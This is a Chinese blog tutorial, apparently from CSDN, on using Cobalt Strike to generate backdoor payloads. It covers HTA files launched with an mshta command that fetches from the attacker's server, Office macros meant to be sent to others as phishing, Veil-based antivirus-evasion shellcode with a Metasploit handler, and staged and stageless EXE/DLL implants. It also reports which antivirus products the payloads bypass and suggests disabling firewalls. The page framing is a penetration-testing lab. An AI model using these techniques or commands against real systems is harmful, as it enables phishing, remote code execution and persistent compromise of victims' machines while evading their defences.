CobaltStrike之后门生成

最新推荐文章于 2024-06-19 15:30:00 发布
最新推荐文章于 2024-06-19 15:30:00 发布
阅读量4k 收藏 10
点赞数 1
分类专栏: CobaltStrike
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/116425165
版权

一.Payload介绍

Payload在渗透测试中大家可以简单地理解为一段漏洞利用/植入后门的代码或程序

二.Cobaltstrike生成后门

在这里插入图片描述

1.HTML Application(生成基于HTML的攻击载荷,比如可执行文件,Powershell,VBA)

HTML Application用于生成hta类型的文件。HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。HTML Application有三种类型的生成方式,测试发现,只有powershell方式生成的hta文件才能正常执行上线,Executable和VBA方式生成的hta文件执行的时候提示当前页面的脚本发生错误。
在这里插入图片描述
演示:基于Powershell方式生成的hta文件,执行上线
(1)生成一个PowerShell的hta文件
(2)选择钓鱼攻击中的文件下载
在这里插入图片描述
(3)设置该文件路径
在这里插入图片描述
(4)生成后将会给一个下载链接
在这里插入图片描述
(5)利用win7访问
cmd中输入命令:mshta http://192.168.188.158:80/download/file.ext
注:mshta是mshta.exe,属于微软Windows操作系统相关程序,用于执行.HTA文件
在这里插入图片描述
(6)返回客户端查看,发现win7成功上线
在这里插入图片描述
另外两种不推荐使用,因为会报如下界面:
在这里插入图片描述

2.MS OFFICE MACRO(生成基于Office的攻击载荷)

演示:
(1)打开此模块,选择监听器,点击Generate
在这里插入图片描述
(2)点击Copy MaCro
在这里插入图片描述
(3)打开word编辑器,点击视图,点击宏,随便写入一个名字,点击创建
在这里插入图片描述
(4)删除里面的代码,粘贴刚才cs中生成的代码进去,保存并退出
在这里插入图片描述
(5)将该文档发给其他人,只要用word打开并且其word开启了宏,我们的CS就会弹回shell,机器成功上线,进程名为rundll32.exe

3.PAYLOAD GENERATOR(载荷生成器,可用于生成C,C#,Java,Python等)

该模块用于生成各种语言版本的shellcode,然后用其他语言进行编译生成
这里便涉及到免杀了,也有免杀框架Veil中的shellcode等
演示(Veil生成免杀payload渗透win10获取shell):
1.kali中默认没有Veil,因此输入以下命令
命令:apt-get update && apt-get install veil
在这里插入图片描述
2.安装后启动veil
在这里插入图片描述
第一次进入时选择y进行加载,加载
加载完后重新打开veil,发现如下图
在这里插入图片描述
此时输入如下命令:
/usr/share/veil/config/setup.sh --force --silent
在这里插入图片描述
最后出现Done为成功安装,因此即可成功打开veil
在这里插入图片描述
3.这里使用1) Evasion
在这里插入图片描述
list列出可用的有效载荷,payloaD共有41种,这里选择13号的cs/shellcode_inject/virtual.py
在这里插入图片描述
在这里插入图片描述
做一些基本配置,然后运行generate生成有效载荷,我们选择4带有shellcode的有效载荷。这里需要输入本机IP和该payload使用的端口,设置成9999
在这里插入图片描述
同时也能看到文件保存位置
在这里插入图片描述
编译后的文件被保存在var/lib/veil/output/compiled/1.exe,新生成的shellcode的rc文件被保存在/var/lib/veil/output/handlers/1.rc,有了rc文件,我们便可以利用msf进行调用
4.在生成的shellcode的rc文件目录下运行
命令:msfconsole -r 1.rc
在这里插入图片描述
5.将生成的1.exe放到win10机器上
在这里插入图片描述
发现立马被D盾查杀(所以这个免杀不是很好),但是360的话可以被绕过,执行1.exe文件,将成功反弹shell
用VT检测
在这里插入图片描述
所以这个免杀不是很好,也说明这个文件在VT是交了很多次

4.Windows Excutable/Windows Excutable(s)(生成EXE,DLL后门)

(1)Windows Excutable生成的后门是WindoWs可执行文件,如exe,dll
在这里插入图片描述
Exe文件运行后,CS即可收到目标主机的会话
至于DLL大家可以使用针对DLL的相关攻击手法,这个我日后会写文章专门来讲
(2)Windows Excutable(S)带有生成出的是stageless版本(无状态Windows后门木马)下面简单说下这个无状态木马的使用方法。一般使用无状态木马的网络环境是这样的
在这里插入图片描述
首先你需要让一台主机作为中转器,配合无状态木马使用
在这里插入图片描述
这里选择中转器的监听器生成木马。需要注意–如果开启了防火墙会产生一个Windows安全警报。因此最好提前用cmd添加一个防火墙放行规则或关闭防火墙,随后便可将无状态的木马上传到内网的其他机器运行后返回一个会话

番茄酱料
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
153.网络安全渗透测试—[Cobalt Strike系列]—[生成hta/exe/宏后]
qwsn
03-25 2484
一、后简介 1、hta 2、exe 3、宏病毒后 二、生成并测试 1、生成HTA并测试 2、生成exe并测试 3、生成宏病毒后并测试
Cobalt Strike后渗透神器入
2301_77147676的博客
03-27 293
你需要掌握的三大神器,metasploit、empire、cobalt strike。在前面的实验中,我们分别介绍了(漏洞利用)和empire(后控制)。今天的主题是个,或许你早在上就看到过这个黄毛小子,kali自带的metasploit图形版软件:armitage。cobalt strike是armitage的升级版,跟着本篇文章,一起来捉个鸡啦,静享丝滑~作者:ailx10链接:https://zhuanlan.zhihu.com/p/261147503来源:知乎著作权归作者所有。
Cobalt Strike主机上线(使用Payload Generator模块)
qiuqiunile_的博客
10-10 986
cs的攻击方式很多,这只是方法之一。 该模块可以生成不同语言的payload,我们可以在不同环境下执行。 1.首先建立一个监听 2.打开payload generator模块,选择刚刚建立的监听,output选择powershell command,并勾选上use x64 payload 点击generate会叫我们选择保存payload的位置 将保存的payload.txt文件打开,并在靶机的终端运行 在cs中可以看到该主机上线! ...
CobaltStrike安装使用
weixin_51151498的博客
04-18 1711
CobaltStrike安装使用
CobaltStrike后渗透进阶篇
最新发布
2401_84466225的博客
06-19 1205
钓鱼攻击主要通过生成的木马诱使受害者运行后上线,其中木马一般都伪装成正常的程序。与此同时配合钓鱼网站可帮助攻击者模拟真实网站诱骗受害者访问,达到获取账号密码、上线木马等目的。接下来主要介绍后程序的生成及钓鱼模块的使用,共包括以下几个层面克隆网站键盘记录克隆网站执行木马MSF配合CS钓鱼。
网络攻防作业——学习使用cobaltStrike
yyy7654321的博客
06-28 956
生成Windows下可执行木马(一个有英语版的图,一个中文版的),放在指定的地方。在放在window系统的电脑中运行软件,在弹出阻止消息的时候点击信任运行。3.利用Cobaltstrike生成攻击后,并通过“文件托管” 进行网络共享下载该后,运行后上线。2.利用Cobaltstrike生成攻击后,并通过2种网络共享下载该后,运行后上线;1.利用Cobaltstrike生成攻击后,并通过“文件托管” 进行网络共享。实验工具:VMware,edge,cs。1.登录cs,并生成后面放在指定路径。
逆向分析Cobalt Strike安装后
pandazhengzheng的博客
02-23 1266
逆向分析Cobalt Strike安装后
Cobalt Strike 可持续后的使用(子篇9)
yyj1781572的博客
11-23 643
Cobalt Strike 可持续后的使用
初中语文 古诗文赏析 张蠙《夏日题老将林亭》原文、注释、译文与赏析.doc
10-12
《夏日题老将林亭》是唐代诗人张蠙的一首描绘老将退隐生活状况的古诗。这首诗通过老将的视角,反映了古代战争功臣在功成名就后的孤独与闲适,同时也寓含了对...张蠙的诗才在当时颇受推崇,这首诗便是其才华的体现之一。
著名的诗句.ppt
11-25
2. **赠婢** - 崔郊:诗人借女子之口,表达了豪生活的无常与人生的无奈,"侯一入深似海,从此萧郎是路人"形象地展现了封建社会中身份地位的无情隔阂。 3. **离思** - 元稹:诗人以自然景色寓言情感,"曾经沧海...
0410-江苏省-红楼梦研究.docx
09-08
15. 绣户侯女:这句判词指的是惜春,暗示她最终的命运。 填空题涉及《红楼梦》的研究方法、时代背景、艺术地位以及曹雪芹的个人情况。新红学代表人物如胡适、俞平伯等致力于考证《红楼梦》的作者和创作背景。贾府...
部编版六年级(下)语文期末复习知识点总结.pdf
10-11
易读错的字包括吃、擦、黑、眨、眼、小贩、熬粥、甜腻、脏、水汤匙、浓稠、搅、褐色、侯、充盈、栖息等。 二、易写错的字 易写错的字包括醋、粥、腻、稠、褐、侯、盈、栖等,需要注意字的结构、部首、笔顺等。 ...
部编版小学六年级(下册)期末复习知识点总结.pdf
10-11
- 在这个部分,学生需要特别关注字的正确读音和书写,如“吃醋”的“醋”,“熬粥”的“熬”,以及“侯”的“侯”等,防止因读音或书写错误而失分。 2. **词语掌握**: - 学生应能熟练掌握并正确拼写如“大蒜”...
魔改CobaltStrike:二开及后生成分析
mai1zhi2的博客
04-21 3119
一、概述: 这次文章主要介绍下Cobalt Strike 4.1相关功能的二开和后(artifact.exe\beacon.exe)的生成方式,Cobalt Strike的jar包我已反编译,并改了下反编译后的bug,teamserver与agressor均能正常调试使用,附反编译后项目地址: https://github.com/mai1zhi2/CobaltstrikeSource 。若有不对的地方希望大伙指出,谢谢。后续将会再分享通讯协议与自定义客户端(后)。PS:感谢Moriarty的分享课。
网络攻击与防御
m0_73761312的博客
06-28 676
(2.1)在kali机打开/var/www/html/,找到index.html,将其复制到主机cs4.5所在文件夹。在主机浏览器打开kali的ip地址下所存在的网页,用网页共享的方式诱导目标机下载flash.exe病毒软件。在主机浏览器打开kali的ip地址下所存在的网页,用网页共享的方式诱导目标机下载flash.exe病毒软件。(3)生成后保存在home文件夹,在文件系统中找到home,找到payload文件,将其复制到主机桌面。(2.3)在kali浏览器输入kali机ip地址+ :80,显示成功。
CS之攻击菜单详解-后生成与上线
good good study
02-28 5299
能够生成HTA文档、office宏、payload生成器、exe程序。 windows可执行程序exe 可以看到能生成两种windows可执行程序,其分别代表stage分阶段和unstage(stageless)不分阶段。传送 ——>Cobalt Strikepayloadstage与unstage区别 选择监听器后,按需生成不同类型的exe 然后在目标机器运行即可上线 payload生成器 选择生成如下类型的后 ——>https://che...
Cobaltstrike系列教程(二)Listner与Payload生成
热门推荐
J0o1ey Blog
08-01 1万+
0x000-前文 Cobaltstrike系列教程(一)简介与安装 https://bbs.ichunqiu.com/thread-52937-1-1.html PS:原本想完成日更目标的,但昨天在研究无线,就没更,今天加班~ 0x001-Listner(监听器)介绍 ①Cobaltstrike listner简介 可能有一些小白并不理解什么叫做listner,在此科普一下。 Listner(监...
[笔记]攻防工具分享之 CobaltStrike框架 《二》生成
二次元怪兽的博客
08-07 775
默认会有一个已经建立的好的监听配置我们可以修改它 或者添加一个新的监听配置。
内网渗透神器CobaltStrike之钓鱼攻击(六)
xf555er的博客
11-22 2821
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
CobaltStrike环境搭建及客户端连接服务器端
bring_coco的博客
12-17 9547
CobaltStrike是一款非常强大的工具,和MSF类似,但功能更加强大。 首先CobaltStrike文件包下载下之后,服务器端是只支持在linux系统中的,同时这个工具是需要java环境的,官方提倡大家使用,但我这里为了方便就安装的ubuntu里简单的openjdk-8-jdk: Java安装步骤:1.先更新源,命令sudo apt-get update 2.java -version(有的话当然不需要安装,没有的话下面会有安装选择) 3.sudo apt-get install openjdk-8-
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值